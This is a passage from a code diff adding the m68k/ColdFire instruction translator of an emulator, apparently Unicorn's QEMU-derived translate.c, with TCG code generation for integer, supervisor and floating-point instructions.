tcg_gen_shli_i32(tcg_ctx, dest, *(TCGv *)tcg_ctx->QREG_CC_X, 4); + tcg_gen_or_i32(tcg_ctx, dest, dest, *(TCGv *)tcg_ctx->QREG_CC_DEST); + return dest; +} + +DISAS_INSN(move_from_ccr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv ccr; + + ccr = gen_get_ccr(s); + reg = DREG(insn, 0); + gen_partset_reg(s, OS_WORD, reg, ccr); +} + +DISAS_INSN(neg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv src1; + + reg = DREG(insn, 0); + src1 = tcg_temp_new(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, src1, reg); + tcg_gen_neg_i32(tcg_ctx, reg, src1); + s->cc_op = CC_OP_SUB; + gen_update_cc_add(s, reg, src1); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, 
tcg_const_i32(tcg_ctx, 0), src1); + s->cc_op = CC_OP_SUB; +} + +static void gen_set_sr_im(DisasContext *s, uint16_t val, int ccr_only) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, val & 0xf); + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, (val & 0x10) >> 4); + if (!ccr_only) { + gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, val & 0xff00)); + } +} + +static void gen_set_sr(CPUM68KState *env, DisasContext *s, uint16_t insn, + int ccr_only) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + TCGv reg; + + s->cc_op = CC_OP_FLAGS; + if ((insn & 0x38) == 0) + { + tmp = tcg_temp_new(tcg_ctx); + reg = DREG(insn, 0); + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, reg, 0xf); + tcg_gen_shri_i32(tcg_ctx, tmp, reg, 4); + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, tmp, 1); + if (!ccr_only) { + gen_helper_set_sr(tcg_ctx, tcg_ctx->cpu_env, reg); + } + } + else if ((insn & 0x3f) == 0x3c) + { + uint16_t val; + val = cpu_lduw_code(env, s->pc); + s->pc += 2; + gen_set_sr_im(s, val, ccr_only); + } + else + disas_undef(env, s, insn); +} + +DISAS_INSN(move_to_ccr) +{ + gen_set_sr(env, s, insn, 1); +} + +DISAS_INSN(not) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + + reg = DREG(insn, 0); + tcg_gen_not_i32(tcg_ctx, reg, reg); + gen_logic_cc(s, reg); +} + +DISAS_INSN(swap) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src1; + TCGv src2; + TCGv reg; + + src1 = tcg_temp_new(tcg_ctx); + src2 = tcg_temp_new(tcg_ctx); + reg = DREG(insn, 0); + tcg_gen_shli_i32(tcg_ctx, src1, reg, 16); + tcg_gen_shri_i32(tcg_ctx, src2, reg, 16); + tcg_gen_or_i32(tcg_ctx, reg, src1, src2); + gen_logic_cc(s, reg); +} + +DISAS_INSN(pea) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + tmp = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp)) { + gen_addr_fault(s); + return; + } + gen_push(s, tmp); +} + +DISAS_INSN(ext) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int 
op; + TCGv reg; + TCGv tmp; + + reg = DREG(insn, 0); + op = (insn >> 6) & 7; + tmp = tcg_temp_new(tcg_ctx); + if (op == 3) + tcg_gen_ext16s_i32(tcg_ctx, tmp, reg); + else + tcg_gen_ext8s_i32(tcg_ctx, tmp, reg); + if (op == 2) + gen_partset_reg(s, OS_WORD, reg, tmp); + else + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + gen_logic_cc(s, tmp); +} + +DISAS_INSN(tst) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + TCGv tmp; + + switch ((insn >> 6) & 3) { + case 0: /* tst.b */ + opsize = OS_BYTE; + break; + case 1: /* tst.w */ + opsize = OS_WORD; + break; + case 2: /* tst.l */ + opsize = OS_LONG; + break; + default: + abort(); + } + SRC_EA(env, tmp, opsize, 1, NULL); + gen_logic_cc(s, tmp); +} + +DISAS_INSN(pulse) +{ + /* Implemented as a NOP. */ +} + +DISAS_INSN(illegal) +{ + gen_exception(s, s->pc - 2, EXCP_ILLEGAL); +} + +/* ??? This should be atomic. */ +DISAS_INSN(tas) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv dest; + TCGv src1; + TCGv addr; + + dest = tcg_temp_new(tcg_ctx); + SRC_EA(env, src1, OS_BYTE, 1, &addr); + gen_logic_cc(s, src1); + tcg_gen_ori_i32(tcg_ctx, dest, src1, 0x80); + DEST_EA(env, insn, OS_BYTE, dest, &addr); +} + +DISAS_INSN(mull) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint16_t ext; + TCGv reg; + TCGv src1; + TCGv dest; + + /* The upper 32 bits of the product are discarded, so + muls.l and mulu.l are functionally equivalent. */ + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (ext & 0x87ff) { + gen_exception(s, s->pc - 4, EXCP_UNSUPPORTED); + return; + } + reg = DREG(ext, 12); + SRC_EA(env, src1, OS_LONG, 0, NULL); + dest = tcg_temp_new(tcg_ctx); + tcg_gen_mul_i32(tcg_ctx, dest, src1, reg); + tcg_gen_mov_i32(tcg_ctx, reg, dest); + /* Unlike m68k, coldfire always clears the overflow bit. 
*/ + gen_logic_cc(s, dest); +} + +DISAS_INSN(link) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int16_t offset; + TCGv reg; + TCGv tmp; + + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + reg = AREG(insn, 0); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_subi_i32(tcg_ctx, tmp, QREG_SP, 4); + gen_store(s, OS_LONG, tmp, reg); + if ((insn & 7) != 7) + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + tcg_gen_addi_i32(tcg_ctx, QREG_SP, tmp, offset); +} + +DISAS_INSN(unlk) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + TCGv tmp; + + src = tcg_temp_new(tcg_ctx); + reg = AREG(insn, 0); + tcg_gen_mov_i32(tcg_ctx, src, reg); + tmp = gen_load(s, OS_LONG, src, 0); + tcg_gen_mov_i32(tcg_ctx, reg, tmp); + tcg_gen_addi_i32(tcg_ctx, QREG_SP, src, 4); +} + +DISAS_INSN(nop) +{ +} + +DISAS_INSN(rts) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + tmp = gen_load(s, OS_LONG, QREG_SP, 0); + tcg_gen_addi_i32(tcg_ctx, QREG_SP, QREG_SP, 4); + gen_jmp(s, tmp); +} + +DISAS_INSN(jump) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp; + + /* Load the target address first to ensure correct exception + behavior. */ + tmp = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp)) { + gen_addr_fault(s); + return; + } + if ((insn & 0x40) == 0) { + /* jsr */ + gen_push(s, tcg_const_i32(tcg_ctx, s->pc)); + } + gen_jmp(s, tmp); +} + +DISAS_INSN(addsubq) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src1; + TCGv src2; + TCGv dest; + int val; + TCGv addr; + + SRC_EA(env, src1, OS_LONG, 0, &addr); + val = (insn >> 9) & 7; + if (val == 0) + val = 8; + dest = tcg_temp_new(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, dest, src1); + if ((insn & 0x38) == 0x08) { + /* Don't update condition codes if the destination is an + address register. 
*/ + if (insn & 0x0100) { + tcg_gen_subi_i32(tcg_ctx, dest, dest, val); + } else { + tcg_gen_addi_i32(tcg_ctx, dest, dest, val); + } + } else { + src2 = tcg_const_i32(tcg_ctx, val); + if (insn & 0x0100) { + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, src2); + tcg_gen_subi_i32(tcg_ctx, dest, dest, val); + s->cc_op = CC_OP_SUB; + } else { + tcg_gen_addi_i32(tcg_ctx, dest, dest, val); + gen_helper_xflag_lt(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, dest, src2); + s->cc_op = CC_OP_ADD; + } + gen_update_cc_add(s, dest, src2); + } + DEST_EA(env, insn, OS_LONG, dest, &addr); +} + +DISAS_INSN(tpf) +{ + switch (insn & 7) { + case 2: /* One extension word. */ + s->pc += 2; + break; + case 3: /* Two extension words. */ + s->pc += 4; + break; + case 4: /* No extension words. */ + break; + default: + disas_undef(env, s, insn); + } +} + +DISAS_INSN(branch) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int32_t offset; + uint32_t base; + int op; + int l1; + + base = s->pc; + op = (insn >> 8) & 0xf; + offset = (int8_t)insn; + if (offset == 0) { + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + } else if (offset == -1) { + offset = read_im32(env, s); + } + if (op == 1) { + /* bsr */ + gen_push(s, tcg_const_i32(tcg_ctx, s->pc)); + } + gen_flush_cc_op(s); + if (op > 1) { + /* Bcc */ + l1 = gen_new_label(tcg_ctx); + gen_jmpcc(s, ((insn >> 8) & 0xf) ^ 1, l1); + gen_jmp_tb(s, 1, base + offset); + gen_set_label(tcg_ctx, l1); + gen_jmp_tb(s, 0, s->pc); + } else { + /* Unconditional branch. 
*/ + gen_jmp_tb(s, 0, base + offset); + } +} + +DISAS_INSN(moveq) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t val; + + val = (int8_t)insn; + tcg_gen_movi_i32(tcg_ctx, DREG(insn, 9), val); + gen_logic_cc(s, tcg_const_i32(tcg_ctx, val)); +} + +DISAS_INSN(mvzs) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + TCGv src; + TCGv reg; + + if (insn & 0x40) + opsize = OS_WORD; + else + opsize = OS_BYTE; + SRC_EA(env, src, opsize, (insn & 0x80) == 0, NULL); + reg = DREG(insn, 9); + tcg_gen_mov_i32(tcg_ctx, reg, src); + gen_logic_cc(s, src); +} + +DISAS_INSN(or) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv dest; + TCGv src; + TCGv addr; + + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + if (insn & 0x100) { + SRC_EA(env, src, OS_LONG, 0, &addr); + tcg_gen_or_i32(tcg_ctx, dest, src, reg); + DEST_EA(env, insn, OS_LONG, dest, &addr); + } else { + SRC_EA(env, src, OS_LONG, 0, NULL); + tcg_gen_or_i32(tcg_ctx, dest, src, reg); + tcg_gen_mov_i32(tcg_ctx, reg, dest); + } + gen_logic_cc(s, dest); +} + +DISAS_INSN(suba) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + + SRC_EA(env, src, OS_LONG, 0, NULL); + reg = AREG(insn, 9); + tcg_gen_sub_i32(tcg_ctx, reg, reg, src); +} + +DISAS_INSN(subx) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv src; + + gen_flush_flags(s); + reg = DREG(insn, 9); + src = DREG(insn, 0); + gen_helper_subx_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, src); +} + +DISAS_INSN(mov3q) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + int val; + + val = (insn >> 9) & 7; + if (val == 0) + val = -1; + src = tcg_const_i32(tcg_ctx, val); + gen_logic_cc(s, src); + DEST_EA(env, insn, OS_LONG, src, NULL); +} + +DISAS_INSN(cmp) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op; + TCGv src; + TCGv reg; + TCGv dest; + int opsize; + + op = (insn >> 6) & 3; + switch (op) { + case 0: /* cmp.b */ + opsize = OS_BYTE; + s->cc_op = CC_OP_CMPB; + break; + case 1: /* cmp.w */ + opsize = OS_WORD; + 
s->cc_op = CC_OP_CMPW; + break; + case 2: /* cmp.l */ + opsize = OS_LONG; + s->cc_op = CC_OP_SUB; + break; + default: + abort(); + } + SRC_EA(env, src, opsize, 1, NULL); + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + tcg_gen_sub_i32(tcg_ctx, dest, reg, src); + gen_update_cc_add(s, dest, src); +} + +DISAS_INSN(cmpa) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int opsize; + TCGv src; + TCGv reg; + TCGv dest; + + if (insn & 0x100) { + opsize = OS_LONG; + } else { + opsize = OS_WORD; + } + SRC_EA(env, src, opsize, 1, NULL); + reg = AREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + tcg_gen_sub_i32(tcg_ctx, dest, reg, src); + gen_update_cc_add(s, dest, src); + s->cc_op = CC_OP_SUB; +} + +DISAS_INSN(eor) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + TCGv dest; + TCGv addr; + + SRC_EA(env, src, OS_LONG, 0, &addr); + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + tcg_gen_xor_i32(tcg_ctx, dest, src, reg); + gen_logic_cc(s, dest); + DEST_EA(env, insn, OS_LONG, dest, &addr); +} + +DISAS_INSN(and) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + TCGv dest; + TCGv addr; + + reg = DREG(insn, 9); + dest = tcg_temp_new(tcg_ctx); + if (insn & 0x100) { + SRC_EA(env, src, OS_LONG, 0, &addr); + tcg_gen_and_i32(tcg_ctx, dest, src, reg); + DEST_EA(env, insn, OS_LONG, dest, &addr); + } else { + SRC_EA(env, src, OS_LONG, 0, NULL); + tcg_gen_and_i32(tcg_ctx, dest, src, reg); + tcg_gen_mov_i32(tcg_ctx, reg, dest); + } + gen_logic_cc(s, dest); +} + +DISAS_INSN(adda) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv src; + TCGv reg; + + SRC_EA(env, src, OS_LONG, 0, NULL); + reg = AREG(insn, 9); + tcg_gen_add_i32(tcg_ctx, reg, reg, src); +} + +DISAS_INSN(addx) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv src; + + gen_flush_flags(s); + reg = DREG(insn, 9); + src = DREG(insn, 0); + gen_helper_addx_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, src); + s->cc_op = CC_OP_FLAGS; +} + +/* TODO: This could be implemented without 
helper functions. */ +DISAS_INSN(shift_im) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + int tmp; + TCGv shift; + + reg = DREG(insn, 0); + tmp = (insn >> 9) & 7; + if (tmp == 0) + tmp = 8; + shift = tcg_const_i32(tcg_ctx, tmp); + /* No need to flush flags becuse we know we will set C flag. */ + if (insn & 0x100) { + gen_helper_shl_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } else { + if (insn & 8) { + gen_helper_shr_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } else { + gen_helper_sar_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } + } + s->cc_op = CC_OP_SHIFT; +} + +DISAS_INSN(shift_reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv shift; + + reg = DREG(insn, 0); + shift = DREG(insn, 9); + /* Shift by zero leaves C flag unmodified. */ + gen_flush_flags(s); + if (insn & 0x100) { + gen_helper_shl_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } else { + if (insn & 8) { + gen_helper_shr_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } else { + gen_helper_sar_cc(tcg_ctx, reg, tcg_ctx->cpu_env, reg, shift); + } + } + s->cc_op = CC_OP_SHIFT; +} + +DISAS_INSN(ff1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + reg = DREG(insn, 0); + gen_logic_cc(s, reg); + gen_helper_ff1(tcg_ctx, reg, reg); +} + +static TCGv gen_get_sr(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv ccr; + TCGv sr; + + ccr = gen_get_ccr(s); + sr = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, sr, *(TCGv *)tcg_ctx->QREG_SR, 0xffe0); + tcg_gen_or_i32(tcg_ctx, sr, sr, ccr); + return sr; +} + +DISAS_INSN(strldsr) +{ + uint16_t ext; + uint32_t addr; + + addr = s->pc - 2; + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (ext != 0x46FC) { + gen_exception(s, addr, EXCP_UNSUPPORTED); + return; + } + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + if (IS_USER(s) || (ext & SR_S) == 0) { + gen_exception(s, addr, EXCP_PRIVILEGE); + return; + } + gen_push(s, gen_get_sr(s)); + gen_set_sr_im(s, ext, 0); +} + 
+DISAS_INSN(move_from_sr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv sr; + + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + sr = gen_get_sr(s); + reg = DREG(insn, 0); + gen_partset_reg(s, OS_WORD, reg, sr); +} + +DISAS_INSN(move_to_sr) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + gen_set_sr(env, s, insn, 0); + gen_lookup_tb(s); +} + +DISAS_INSN(move_from_usp) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* TODO: Implement USP. */ + gen_exception(s, s->pc - 2, EXCP_ILLEGAL); +} + +DISAS_INSN(move_to_usp) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* TODO: Implement USP. */ + gen_exception(s, s->pc - 2, EXCP_ILLEGAL); +} + +DISAS_INSN(halt) +{ + gen_exception(s, s->pc, EXCP_HALT_INSN); +} + +DISAS_INSN(stop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint16_t ext; + + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + + gen_set_sr_im(s, ext, 0); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_halted, 1); + gen_exception(s, s->pc, EXCP_HLT); +} + +DISAS_INSN(rte) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + gen_exception(s, s->pc - 2, EXCP_RTE); +} + +DISAS_INSN(movec) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint16_t ext; + TCGv reg; + + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + + if (ext & 0x8000) { + reg = AREG(ext, 12); + } else { + reg = DREG(ext, 12); + } + gen_helper_movec(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, ext & 0xfff), reg); + gen_lookup_tb(s); +} + +DISAS_INSN(intouch) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* ICache fetch. Implement as no-op. 
*/ +} + +DISAS_INSN(cpushl) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* Cache push/invalidate. Implement as no-op. */ +} + +DISAS_INSN(wddata) +{ + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); +} + +DISAS_INSN(wdebug) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* TODO: Implement wdebug. */ + qemu_log("WDEBUG not implemented\n"); + gen_exception(s, s->pc - 2, EXCP_UNSUPPORTED); +} + +DISAS_INSN(trap) +{ + gen_exception(s, s->pc - 2, EXCP_TRAP0 + (insn & 0xf)); +} + +/* ??? FP exceptions are not implemented. Most exceptions are deferred until + immediately before the next FP instruction is executed. */ +DISAS_INSN(fpu) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint16_t ext; + int32_t offset; + int opmode; + TCGv_i64 src; + TCGv_i64 dest; + TCGv_i64 res; + TCGv tmp32; + int round; + int set_dest; + int opsize; + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + opmode = ext & 0x7f; + switch ((ext >> 13) & 7) { + case 0: case 2: + break; + case 1: + goto undef; + case 3: /* fmove out */ + src = FREG(ext, 7); + tmp32 = tcg_temp_new_i32(tcg_ctx); + /* fmove */ + /* ??? TODO: Proper behavior on overflow. 
*/ + switch ((ext >> 10) & 7) { + case 0: + opsize = OS_LONG; + gen_helper_f64_to_i32(tcg_ctx, tmp32, tcg_ctx->cpu_env, src); + break; + case 1: + opsize = OS_SINGLE; + gen_helper_f64_to_f32(tcg_ctx, tmp32, tcg_ctx->cpu_env, src); + break; + case 4: + opsize = OS_WORD; + gen_helper_f64_to_i32(tcg_ctx, tmp32, tcg_ctx->cpu_env, src); + break; + case 5: /* OS_DOUBLE */ + tcg_gen_mov_i32(tcg_ctx, tmp32, AREG(insn, 0)); + switch ((insn >> 3) & 7) { + case 2: + case 3: + break; + case 4: + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, -8); + break; + case 5: + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, offset); + break; + default: + goto undef; + } + gen_store64(s, tmp32, src); + switch ((insn >> 3) & 7) { + case 3: + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, 8); + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp32); + break; + case 4: + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp32); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp32); + return; + case 6: + opsize = OS_BYTE; + gen_helper_f64_to_i32(tcg_ctx, tmp32, tcg_ctx->cpu_env, src); + break; + default: + goto undef; + } + DEST_EA(env, insn, opsize, tmp32, NULL); + tcg_temp_free_i32(tcg_ctx, tmp32); + return; + case 4: /* fmove to control register. */ + switch ((ext >> 10) & 7) { + case 4: /* FPCR */ + /* Not implemented. Ignore writes. */ + break; + case 1: /* FPIAR */ + case 2: /* FPSR */ + default: + qemu_log("Unimplemented: fmove to control %d\n", + (ext >> 10) & 7); + goto undef; + } + break; + case 5: /* fmove from control register. */ + switch ((ext >> 10) & 7) { + case 4: /* FPCR */ + /* Not implemented. Always return zero. 
*/ + tmp32 = tcg_const_i32(tcg_ctx, 0); + break; + case 1: /* FPIAR */ + case 2: /* FPSR */ + default: + qemu_log("Unimplemented: fmove from control %d\n", + (ext >> 10) & 7); + goto undef; + } + DEST_EA(env, insn, OS_LONG, tmp32, NULL); + break; + case 6: /* fmovem */ + case 7: + { + TCGv addr; + uint16_t mask; + int i; + if ((ext & 0x1f00) != 0x1000 || (ext & 0xff) == 0) + goto undef; + tmp32 = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp32)) { + gen_addr_fault(s); + return; + } + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, addr, tmp32); + mask = 0x80; + for (i = 0; i < 8; i++) { + if (ext & mask) { + s->is_mem = 1; + dest = FREG(i, 0); + if (ext & (1 << 13)) { + /* store */ + tcg_gen_qemu_stf64(s->uc, dest, addr, IS_USER(s)); + } else { + /* load */ + tcg_gen_qemu_ldf64(s->uc, dest, addr, IS_USER(s)); + } + if (ext & (mask - 1)) + tcg_gen_addi_i32(tcg_ctx, addr, addr, 8); + } + mask >>= 1; + } + tcg_temp_free_i32(tcg_ctx, addr); + } + return; + } + if (ext & (1 << 14)) { + /* Source effective address. 
*/ + switch ((ext >> 10) & 7) { + case 0: opsize = OS_LONG; break; + case 1: opsize = OS_SINGLE; break; + case 4: opsize = OS_WORD; break; + case 5: opsize = OS_DOUBLE; break; + case 6: opsize = OS_BYTE; break; + default: + goto undef; + } + if (opsize == OS_DOUBLE) { + tmp32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp32, AREG(insn, 0)); + switch ((insn >> 3) & 7) { + case 2: + case 3: + break; + case 4: + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, -8); + break; + case 5: + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, offset); + break; + case 7: + offset = cpu_ldsw_code(env, s->pc); + offset += s->pc - 2; + s->pc += 2; + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, offset); + break; + default: + goto undef; + } + src = gen_load64(s, tmp32); + switch ((insn >> 3) & 7) { + case 3: + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, 8); + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp32); + break; + case 4: + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp32); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp32); + } else { + SRC_EA(env, tmp32, opsize, 1, NULL); + src = tcg_temp_new_i64(tcg_ctx); + switch (opsize) { + case OS_LONG: + case OS_WORD: + case OS_BYTE: + gen_helper_i32_to_f64(tcg_ctx, src, tcg_ctx->cpu_env, tmp32); + break; + case OS_SINGLE: + gen_helper_f32_to_f64(tcg_ctx, src, tcg_ctx->cpu_env, tmp32); + break; + } + } + } else { + /* Source register. 
*/ + src = FREG(ext, 10); + } + dest = FREG(ext, 7); + res = tcg_temp_new_i64(tcg_ctx); + if (opmode != 0x3a) + tcg_gen_mov_f64(tcg_ctx, res, dest); + round = 1; + set_dest = 1; + switch (opmode) { + case 0: case 0x40: case 0x44: /* fmove */ + tcg_gen_mov_f64(tcg_ctx, res, src); + break; + case 1: /* fint */ + gen_helper_iround_f64(tcg_ctx, res, tcg_ctx->cpu_env, src); + round = 0; + break; + case 3: /* fintrz */ + gen_helper_itrunc_f64(tcg_ctx, res, tcg_ctx->cpu_env, src); + round = 0; + break; + case 4: case 0x41: case 0x45: /* fsqrt */ + gen_helper_sqrt_f64(tcg_ctx, res, tcg_ctx->cpu_env, src); + break; + case 0x18: case 0x58: case 0x5c: /* fabs */ + gen_helper_abs_f64(tcg_ctx, res, src); + break; + case 0x1a: case 0x5a: case 0x5e: /* fneg */ + gen_helper_chs_f64(tcg_ctx, res, src); + break; + case 0x20: case 0x60: case 0x64: /* fdiv */ + gen_helper_div_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + break; + case 0x22: case 0x62: case 0x66: /* fadd */ + gen_helper_add_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + break; + case 0x23: case 0x63: case 0x67: /* fmul */ + gen_helper_mul_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + break; + case 0x28: case 0x68: case 0x6c: /* fsub */ + gen_helper_sub_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + break; + case 0x38: /* fcmp */ + gen_helper_sub_cmp_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + set_dest = 0; + round = 0; + break; + case 0x3a: /* ftst */ + tcg_gen_mov_f64(tcg_ctx, res, src); + set_dest = 0; + round = 0; + break; + default: + goto undef; + } + if (ext & (1 << 14)) { + tcg_temp_free_i64(tcg_ctx, src); + } + if (round) { + if (opmode & 0x40) { + if ((opmode & 0x4) != 0) + round = 0; + } else if ((s->fpcr & M68K_FPCR_PREC) == 0) { + round = 0; + } + } + if (round) { + TCGv tmp = tcg_temp_new_i32(tcg_ctx); + gen_helper_f64_to_f32(tcg_ctx, tmp, tcg_ctx->cpu_env, res); + gen_helper_f32_to_f64(tcg_ctx, res, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_mov_f64(tcg_ctx, 
tcg_ctx->QREG_FP_RESULT, res); + if (set_dest) { + tcg_gen_mov_f64(tcg_ctx, dest, res); + } + tcg_temp_free_i64(tcg_ctx, res); + return; +undef: + /* FIXME: Is this right for offset addressing modes? */ + s->pc -= 2; + disas_undef_fpu(env, s, insn); +} + +DISAS_INSN(fbcc) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t offset; + uint32_t addr; + TCGv flag; + int l1; + + addr = s->pc; + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + if (insn & (1 << 6)) { + offset = (offset << 16) | cpu_lduw_code(env, s->pc); + s->pc += 2; + } + + l1 = gen_new_label(tcg_ctx); + /* TODO: Raise BSUN exception. */ + flag = tcg_temp_new(tcg_ctx); + gen_helper_compare_f64(tcg_ctx, flag, tcg_ctx->cpu_env, tcg_ctx->QREG_FP_RESULT); + /* Jump to l1 if condition is true. */ + switch (insn & 0xf) { + case 0: /* f */ + break; + case 1: /* eq (=0) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_EQ, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 2: /* ogt (=1) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_EQ, flag, tcg_const_i32(tcg_ctx, 1), l1); + break; + case 3: /* oge (=0 or =1) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_LEU, flag, tcg_const_i32(tcg_ctx, 1), l1); + break; + case 4: /* olt (=-1) */ + 